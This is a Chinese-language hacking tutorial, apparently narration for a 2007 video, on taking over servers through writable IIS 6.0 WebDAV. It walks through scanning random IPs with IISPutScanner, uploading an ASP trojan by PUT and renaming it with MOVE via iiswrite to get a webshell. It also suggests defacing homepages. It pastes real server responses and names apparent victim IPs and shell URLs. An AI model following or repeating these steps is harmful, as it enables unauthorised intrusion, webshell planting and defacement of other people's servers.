利用IIS可写漏洞拿网站shell

大家好，我是飞鱼QQ：405186193
今天给大家作个利用IIS可写漏洞拿网站shell的动画。。
用到的工具有：
1。IISPutScanner.exe
2。iiswrite.exe
3。纯真IP数据库
4。asp大马和小马

下面开始。。。
首先用纯真IP数据库找些活跃IP，也可以在baidu上搜些。。。。

然后用IISPutScanner.exe扫描存在漏洞的IP。

我已经提前扫了。。

这些有红色感叹号的IP就是有漏洞的IP。

双击。。在这里写入asp小马。。然后点PUT提交
注意这里要记住这个txt文件名。/feiyu.txt
feiyu.txt
提交成功后
用这个工具iiswrite.exe。可以把我们提交的txt文件改成asp格式的。。
就是asp木马了。。呵呵

域名这填刚才那个IP
请求文件写刚才的 txt 文件名
然后数据包格式选MOVE。。。。然后点提交数据包。。。
返回是这个就行了。。
HTTP/1.1 201 Created
Date: Tue, 03 Jul 2007 13:02:45 GMT
Server: Microsoft-IIS/6.0
Location: http://222.240.190.98/feiyu.asp
Content-Type: text/xml
Content-Length: 0

asp小马好了http://222.240.205.165/fei.asp
传大马
好了
在做几个

HTTP/1.1 207 Multi-Status
Date: Tue, 03 Jul 2007 12:58:52 GMT
Server: Microsoft-IIS/6.0
Location: http://218.75.199.212/feiyu.asp
Content-Type: text/xml
Transfer-Encoding: chunked

b7
<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:href>http://218.75.199.212/feiyu.asp</a:href><a:status>HTTP/1.1 403 Forbidden</a:status></a:response></a:multistatus>
0
返回这个就不行了。。
换
个
再换
http://222.240.205.165/feiyu.asp

哈哈
行了

好了
教程到次
其实如果
数据不能改的话。我们也可以直接传个网页。可以改他的主页，，

谢谢。。